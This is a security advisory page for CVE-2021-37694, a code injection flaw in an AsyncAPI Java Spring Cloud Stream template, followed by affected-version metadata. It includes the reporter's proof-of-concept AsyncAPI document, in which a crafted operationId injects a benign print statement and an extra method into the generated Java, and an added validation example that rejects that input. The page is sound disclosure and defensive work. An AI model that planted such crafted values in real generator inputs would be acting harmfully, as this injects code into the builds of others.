Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNnItMmpwbS1xdnhw
Code injection issue for java-spring-cloud-stream-template
The following was initially reported by @jonaslagoni:
Given the following command:
ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output
With the following AsyncAPI document:
{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas": {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": {
            "type": "string"
          }
        }
      }
    }
  }
}
Which changes the following output:
...
@Bean
public Consumer<CustomClass> test() {
    // Add business logic here.
    return null;
}
...
To
...
@Bean
public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
public Consumer<CustomClass> someothername() {
    // Add business logic here.
    return null;
}
...
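The report above shows the root cause: the template splices operationId straight into generated Java source, so a value containing braces, parentheses and a newline becomes method bodies and a second method instead of a method name. The following is an added example, not code from the java-spring-cloud-stream-template project, showing the check a generator can apply before rendering: accept only strings that are valid Java identifiers and not reserved words, and refuse the rest. The function names, the rendering stub and the sample inputs are constructed for illustration.

```javascript
// Added example (not the project's own code): validate an AsyncAPI operationId
// before it is interpolated into generated Java. Function names are hypothetical.

// Java keywords and literals that cannot be used as method names.
const JAVA_RESERVED = new Set([
  'abstract', 'assert', 'boolean', 'break', 'byte', 'case', 'catch', 'char',
  'class', 'const', 'continue', 'default', 'do', 'double', 'else', 'enum',
  'extends', 'final', 'finally', 'float', 'for', 'goto', 'if', 'implements',
  'import', 'instanceof', 'int', 'interface', 'long', 'native', 'new',
  'package', 'private', 'protected', 'public', 'return', 'short', 'static',
  'strictfp', 'super', 'switch', 'synchronized', 'this', 'throw', 'throws',
  'transient', 'try', 'void', 'volatile', 'while', 'true', 'false', 'null',
]);

// A plain Java identifier: letter, '_' or '$' followed by letters, digits, '_' or '$'.
// Deliberately ASCII-only: anything else (braces, parentheses, whitespace,
// newlines) would otherwise be emitted verbatim into the .java file.
const JAVA_IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

function isSafeJavaMethodName(name) {
  return typeof name === 'string'
    && JAVA_IDENTIFIER.test(name)
    && !JAVA_RESERVED.has(name);
}

// Minimal stand-in for the consumer bean the template renders. Unlike the
// vulnerable template, it refuses to render when the name is not an identifier.
function renderConsumerBean(operationId, payloadType) {
  if (!isSafeJavaMethodName(operationId)) {
    throw new Error(`operationId is not a valid Java method name: ${JSON.stringify(operationId)}`);
  }
  // The payload class name is generated from the schema name, so it gets the same check.
  if (!isSafeJavaMethodName(payloadType)) {
    throw new Error(`payload type is not a valid Java identifier: ${JSON.stringify(payloadType)}`);
  }
  return [
    '@Bean',
    `public Consumer<${payloadType}> ${operationId}() {`,
    '    // Add business logic here.',
    '    return null;',
    '}',
  ].join('\n');
}

// Constructed inputs: a benign operationId and the one from the report above.
const BENIGN_ID = 'test';
const INJECTED_ID = 'test() { System.out.println("injected"); return test(0); }\n public Consumer<CustomClass> someothername';

// Runs both inputs through the guarded renderer and reports the outcome.
function demo() {
  const rendered = renderConsumerBean(BENIGN_ID, 'CustomClass');
  let rejected = false;
  try {
    renderConsumerBean(INJECTED_ID, 'CustomClass');
  } catch (e) {
    rejected = true;
  }
  return { rendered, rejected };
}

console.log(demo());
```

The regex is intentionally stricter than the Java Language Specification (which also allows non-ASCII letters); for a generator, rejecting an unusual but legal name is the safer failure, because the alternative is emitting the untrusted string into compiled source.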
Permalink: https://github.com/advisories/GHSA-xj6r-2jpm-qvxp
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNnItMmpwbS1xdnhw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 3 years ago
Updated: over 1 year ago
CVSS Score: 8.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Identifiers: GHSA-xj6r-2jpm-qvxp, CVE-2021-37694
References:
- https://github.com/asyncapi/java-spring-cloud-stream-template/security/advisories/GHSA-xj6r-2jpm-qvxp
- https://nvd.nist.gov/vuln/detail/CVE-2021-37694
- https://github.com/advisories/GHSA-xj6r-2jpm-qvxp
Blast Radius: 2.6
Affected Packages
npm:@asyncapi/java-spring-cloud-stream-template
Dependent packages: 7
Dependent repositories: 2
Downloads: 533 last month
Affected Version Ranges: <= 0.6.9
Fixed in: 0.7.0
All affected versions: 0.3.0, 0.3.1, 0.3.2, 0.4.0, 0.4.1, 0.5.0, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4, 0.6.5, 0.6.6, 0.6.7, 0.6.8, 0.6.9
All unaffected versions: 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.9.0, 0.9.1, 0.10.0, 0.11.0, 0.11.1, 0.11.2, 0.11.3, 0.11.4, 0.11.5, 0.11.6, 0.11.7, 0.12.0, 0.12.1, 0.13.0, 0.13.1, 0.13.2, 0.13.3, 0.13.4